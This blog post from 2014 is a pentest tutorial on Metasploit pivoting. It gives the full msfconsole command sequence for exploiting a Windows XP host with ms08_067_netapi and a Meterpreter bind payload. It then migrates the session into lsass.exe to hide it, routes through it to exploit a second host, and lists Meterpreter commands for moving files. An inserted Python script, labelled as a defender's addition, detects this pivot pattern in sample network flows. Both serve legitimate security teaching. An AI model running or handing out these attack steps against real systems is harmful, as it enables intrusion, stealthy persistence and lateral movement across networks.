Monday 21 April 2014

Metasploit Attack on Another Network (Pivoting)


Pivoting refers to the practice of hacking a network computer or server and then using that host to attack other computer systems from within the network. By launching attacks from within the network, the attacker bypasses firewall policy and can execute attacks that would not be possible from outside the network. By using a compromised system to launch attacks from, the attacker has an improved prospect of remaining undetected and can leave less of a fingerprint.


Exploit:
In the example pentest below, the goal is to exploit a host on the network and establish a hidden Meterpreter session, then, using pivoting, exploit another host on the network.

Requirements:
The pentest exercise was conducted with the Backtrack 5 VMware virtual machine against two hosts running Windows XP Pro, Service Pack 2.

Exploit steps:

Open a terminal in Backtrack and enter the following commands:

#msfconsole
msf > show exploits
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
     PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST <1st victim's ip address>
     RHOST => <ip address>
msf exploit(ms08_067_netapi) > exploit        //if you are successful, you will see a meterpreter prompt
meterpreter >                    //if you see this you have a Meterpreter shell
meterpreter > shell           //this will give you a Windows command prompt/shell
C:\WINDOWS\system32> exit             //exit out of the Windows command prompt
meterpreter > getpid                 //note the process id that Meterpreter is using
meterpreter > ps              //list all running processes on the victim machine. What process does your PID show up as? svchost.exe? Look for the process "lsass.exe"; it may show up as PID 700
meterpreter > migrate 700           //migrate Meterpreter to the lsass.exe process
meterpreter > getpid                     //verify your new process ID
ctrl+z                             //key in ctrl+z to background the Meterpreter session
msf > route add <2nd victim's ip address> <subnet mask> <session id #>           //route a new attack to victim 2 through the backgrounded session
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST <2nd victim's ip address>
msf exploit(ms08_067_netapi) > exploit
meterpreter >                           //success!
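Seen from the network, the pivot above has a recognisable shape: victim 1 is first the target of an SMB (tcp/445) connection from outside the workstation subnet, and a few minutes later the same host becomes an SMB client to other machines inside the subnet, which is not something a workstation normally does. The script below is an added defender's example, not code from the original post, that looks for exactly that sequence in a list of connection records. The record format, the subnet 192.168.56.0/24, the attacker address 10.0.0.5, the host addresses and the listener port 4444 are all constructed for the example.

```python
"""Detect the 'SMB target, then SMB client to peers' pattern of a pivot."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

SMB_PORT = 445


@dataclass(frozen=True)
class Flow:
    """One TCP connection attempt: timestamp, source, destination, dest port."""
    ts: datetime
    src: str
    dst: str
    dport: int


# Constructed sample flows (not real data). 192.168.56.0/24 is the workstation
# subnet; 10.0.0.5 stands in for the attacker's machine; 4444 is an assumed
# listener port for the bind payload.
SAMPLE_FLOWS = [
    Flow(datetime(2014, 4, 21, 10, 0, 0), "192.168.56.10", "192.168.56.20", 445),    # ordinary peer SMB
    Flow(datetime(2014, 4, 21, 10, 1, 0), "10.0.0.5", "192.168.56.101", 445),        # external SMB hit on victim 1
    Flow(datetime(2014, 4, 21, 10, 1, 5), "10.0.0.5", "192.168.56.101", 4444),       # connect to the bind listener
    Flow(datetime(2014, 4, 21, 10, 4, 0), "192.168.56.101", "192.168.56.102", 445),  # victim 1 -> victim 2 over SMB
    Flow(datetime(2014, 4, 21, 10, 4, 1), "192.168.56.101", "192.168.56.102", 4444), # victim 1 -> victim 2 listener
    Flow(datetime(2014, 4, 21, 11, 0, 0), "192.168.56.30", "192.168.56.31", 445),    # ordinary peer SMB
]


def find_pivot_candidates(flows, internal_net, window=timedelta(minutes=30)):
    """Return {pivot_host: [evidence flows]}.

    A host is a candidate when it received SMB from outside `internal_net`
    and, within `window` of that hit, opened SMB to another internal host.
    The first evidence flow is the external hit; the rest are the outbound
    SMB connections that followed it.
    """
    net = ip_network(internal_net)

    def internal(ip):
        return ip_address(ip) in net

    ordered = sorted(flows, key=lambda f: f.ts)

    # Earliest external -> internal SMB connection per internal host.
    first_hit = {}
    for f in ordered:
        if f.dport == SMB_PORT and internal(f.dst) and not internal(f.src):
            first_hit.setdefault(f.dst, f)

    findings = {}
    for f in ordered:
        hit = first_hit.get(f.src)
        if hit is None or f.dport != SMB_PORT:
            continue
        if not internal(f.dst) or f.dst == f.src:
            continue
        if hit.ts <= f.ts <= hit.ts + window:
            findings.setdefault(f.src, [hit]).append(f)
    return findings


def report(findings):
    """Render findings as one line per pivot host, for a ticket or alert."""
    lines = []
    for host, evidence in findings.items():
        targets = sorted({f.dst for f in evidence[1:]})
        lines.append(
            f"{host}: SMB from {evidence[0].src} at {evidence[0].ts:%H:%M:%S}, "
            f"then SMB to {', '.join(targets)}"
        )
    return lines


if __name__ == "__main__":
    for line in report(find_pivot_candidates(SAMPLE_FLOWS, "192.168.56.0/24")):
        print(line)
```

The check keys on direction and timing rather than on any exploit signature, so it also catches pivots that use a different SMB exploit or a different payload; tune the window and add the bind-listener port you actually see on the first victim if you want a tighter rule.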

Now that you have a Meterpreter shell the sky is the limit. Run the help command to see all of the commands available to you. Try creating a directory or file on the victim machine, or uploading or downloading a file to and from the victim. Here are some of the basic Meterpreter commands:

     meterpreter > help                     //help menu
     meterpreter > background         //backgrounds the current session
     meterpreter > exit                      //terminate the meterpreter session
     meterpreter > quit                      //terminate the meterpreter session
     meterpreter > write                    //writes data to a channel
     meterpreter > mkdir                  //creates a directory
     meterpreter > download            //download a file or directory
     meterpreter > upload                //upload a file or directory
     meterpreter > search                //search for a file
